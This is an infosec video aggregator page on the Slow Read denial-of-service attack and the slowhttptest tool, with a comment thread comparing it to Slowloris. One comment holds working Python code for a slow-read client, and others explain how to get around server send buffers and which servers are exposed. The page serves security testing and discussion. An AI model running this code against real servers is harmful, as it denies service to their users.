Description: Demonstration of a Slow Read DoS attack exploiting the TCP persist timer.
Slowhttptest is a DoS simulator that uses slowloris, slow POST, and slow read attacks to test whether a server is vulnerable.
http://code.google.com/p/slowhttptest/
Details: https://community.qualys.com/blogs/securitylabs/2012/01/05/slow-read
Tags: DoS, SlowRead, pentesting, slowloris, qualys
Disclaimer: We are an infosec video aggregator, and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors are the same without verifying.
I don't see how this is different from Slow Loris?
Slowloris sends incomplete requests. Slow Read sends legitimate, complete requests but reads the responses slowly. That's a huge difference in footprint, detection, and mitigation approaches.
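The read side of that difference can be sketched with a plain socket client. The request below is complete and well-formed (unlike Slowloris); the attack is entirely in how slowly the response is drained. Host, path, chunk size, and timings here are illustrative placeholders, not tuned values:

```python
import socket
import time

def slow_read(host, port, path="/", chunk=8, delay=1.0, max_secs=30):
    """Send a complete, valid HTTP request, then drain the response
    a few bytes at a time with long pauses between reads."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # A tiny receive buffer shrinks the TCP window we advertise,
    # so the server's send buffer backs up behind us.
    s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 256)
    s.settimeout(max_secs)
    s.connect((host, port))
    s.sendall(f"GET {path} HTTP/1.1\r\nHost: {host}\r\n\r\n".encode())

    received = b""
    deadline = time.time() + max_secs
    while time.time() < deadline:
        try:
            data = s.recv(chunk)   # read only `chunk` bytes...
        except socket.timeout:
            break
        if not data:
            break                  # server closed the connection
        received += data
        time.sleep(delay)          # ...then stall before the next read
    s.close()
    return received
```

A real attack would hold many such connections open concurrently; one connection just illustrates the mechanism.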
OK, so it reads the responses slowly - but what if the server is not keeping the connection alive anyway?
I think, personally, I'll stick with Slow Loris - it's just so effective :-)
If the server is not keeping the connection alive, the operating system kernel will keep it open until it delivers the data. Check out http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4609, or google for "persist timer exploit".
Slowloris is detectable in the request phase; slow read is not.
Slowloris is useless against IIS, while slow read is as effective against IIS as it is against Apache, nginx, lighttpd, and so on. Anyway, slowhttptest implements a very configurable slowloris and slow POST as well.
I would appreciate any suggestions and comments.
I agree that Slow Loris is not 100% effective with IIS, but it's not really a server I would target with that kind of attack.
Regarding the kernel buffering the data, I'm not convinced that it would do so in a way useful to a DoS attack, or that you'd bring the server to its knees. Have you tried it in such circumstances? I'd be interested in the results.
It would also be interesting to see how it copes with load balanced sites. I guess if you could take the balancer down, it's game over for the real servers behind it.
The whole range of 'slow' attacks against HTTP servers is interesting and largely unmitigated.
Web server architecture assumes (by design of TCP) that if data can't fit into the kernel buffer, the application should take care of it, e.g. keep polling the socket for write readiness. Most web servers do not distinguish between an active socket and a socket that used to be active (but is now inactive because the kernel couldn't send the data while the peer isn't ready), so they keep that used-to-be-active socket in the concurrent connections pool. The only exception is Apache's MPM Event, which has a separate thread to poll sockets for readiness, but it has other issues. So the only problem is to find a resource that doesn't fit into the server's send buffer. Most configurations rely on OS settings to control the send buffer size, which is typically between 64K and 128K, and it's easy to find a large enough resource (or play with HTTP pipelining) to meet the prerequisite.
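A quick way to see the OS default the comment refers to is to query SO_SNDBUF on a freshly created socket (the exact number is whatever your OS is configured to use; on Linux the kernel may report a doubled value):

```python
import socket

# Query the OS default send-buffer size for a new TCP socket.
# A slow-read attack wants a response larger than this value, so the
# server can't hand the whole response to the kernel and move on.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
default_sndbuf = s.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF)
s.close()
print(f"default SO_SNDBUF: {default_sndbuf} bytes")
```

If the target resource fits entirely into this buffer, the server's write completes immediately and the slow reader only ties up kernel memory, not an application-level connection slot.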
Answering your question: in theory, I don't see why any web server wouldn't be vulnerable, unless it limits the duration of the connection regardless of whether it's in the read state (slowloris) or the write state (slow read). But I don't have any statistical data yet.
Load balancing is a good point to mention. I don't know how load balancers are implemented, but something like a reverse proxy should also be vulnerable, in theory. If you have a server setup with a load balancer, we can try playing with it.